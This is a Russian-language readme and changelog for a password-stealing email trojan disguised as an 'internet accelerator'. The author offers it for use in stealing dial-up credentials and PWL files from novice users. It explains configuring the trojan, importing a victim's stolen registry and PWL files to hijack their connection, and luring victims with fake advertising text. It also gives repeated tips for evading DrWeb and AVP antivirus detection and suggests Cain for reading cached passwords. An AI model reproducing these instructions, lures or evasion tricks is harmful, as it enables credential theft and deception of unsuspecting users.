Последнее обновление - 14 ноября 2001 года
Люди, которые неплохо знают дельфи и которые хотят продолжить этот проект, - пишите.
ИЗМЕНЕНИЯ В ВЕРСИИ 1.666b:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.666a:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.666:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.65:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.64a:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.64:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.63:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.62:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.61:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.6:
ИЗМЕНЕНИЯ В ВЕРСИИ 1.5:
FIU - это мой почтовый троян. Он замаскирован под обычный
"ускоритель интернета" и предназначен для выуживания паролей на dial-up
соединения с Инетом у Васи Пупкина, который всего 3 дня в Сети, и подобных ему
ламеров. Забацал я его после того, как накрылся мой халявный анлим, упертый у
одного ламера из соседнего дома.
В общем, схема проста: скачиваете с моего сайта архив с трояном. В нем
находятся 3 основных файла: readme.txt, config.exe и trojan.exe.
Readme.htm - это документация, которую вы сейчас и читаете.
Config.exe - это конфигуратор трояна, а trojan.exe - его личинка. Также
прилагаются исходники конфигуратора.
Сначало надо запустить конфигуратор и рассказать ему, на какой адрес
e-mail высылать пароли. Затем он создаст файл ready.exe с записанным в него
адресочком. Это и есть готовый троян. Если запустить его с параметром /check5,
то он расскажет, куда будет высылать пароли. Пароли присылаются в виде письма с
заголовком "PASS". Тело письма будет содержать reg-файл и pwl-файлы с
копмьютера-жертвы.
Например:
Если это все сохранить в файл pass.reg, и внести данные из него в
рестр, сделав double click, винда создаст новые соединения с Инетом со всеми
параметрами, которые были у юзера. Затем нужно сохранить pwl-файлы в каталоге с виндой,
перезагрузиться и ввести имя ламера (если был украден vasya.pwl, то имя ламера -
vasya.
Ну вот собственно и все. Осталось только впарить трояна. Самый
хороший способ, на мой взгляд, - создать страничку и написать там:
Fast Internet Utility - новая мощная утилита для ускорения модема и работы в
Интернете, она ускоряет все протоколы: HTTP (WWW), POP3, IMAP4, SMTP, FTP, ICQ,
NNTP.
Либо еще проще - Fast Internet Utility используется для ускорения доступа в
Интернет по коммутируемой телефонной линии в режиме dialup с использованием
протокола TCP/IP.
А теперь можно разрекламировать свой сайт и проверять почтовый ящик.
Не забывайте заходить на мой сайт (www.daphouse.com, если кто не помнит) за
апдейтами и типа того. Также пишите мылом свои впечатления энд предложения.
Ну все, have fun!
Ну все, have fun!
Немного подправлен код, чтобы DrWeb не видел трояна. Теперь троян ворует файлы с паролями от Edialer'a.
Подправлен код, теперь DrWeb не видит трояна.
Подправлен код, чтобы АВП не ловил его. Не забывайте про "THIS DATA..."!
Подправлен код, чтобы АВП не ловил его. Теперь каждый может создать свой троян. В коде файла ready.exe есть блок неипользуемых данных, начинающихся с "THIS DATA IS A SUBJECT TO CHANGE". Просто поменяйте эту строку на что-нибудь другое и тупой АВП никогда не обнаружит трояна.
Новый конфигуратор трояна, написан на с++.
Исправлены баги, теперь троян нормально присылает PWL файлы, SYSTEM.INI и кусок реестра c dial-up соединениями.
Чуть-чуть подправлен код для того, что АВП не ругался.
Конфигуратор не запускался на быстрых машинах. А теперь запускается ;)
Подправлен код для того, чтобы троян не определялся антивирусами.
Других изменений нет, поскольку не было никаких предложений.
Подправлен код для того, чтобы троян не определялся антивирусами.
Сменилась иконка ;)
Добавилась возможность выбирать SMTP хост самостоятельно.
[HKEY_USERS\.Default\RemoteAccess]
"AreaCode"=";095;"
"wizard"=hex:80,00,00,00
"Default"="9955555"
"EnableRedial"=hex:01,00,00,00
"RedialTry"=hex:05,00,00,00
"RedialWait"=hex:02,00,00,00
"EnableImplicit"=hex:01,00,00,00
"DialUI"=hex:02,00,00,00
.......И т.д., и т.п........
Ну что, не получилось с соединениями? Тогда, когда войдешь под именем юзера,
запусти любую прогу, которая показывает находящиеся в кэше пароли и ты их все
увидишь. Я люблю для таких целей использовать Cain (где взять? конечно же на поисковиках).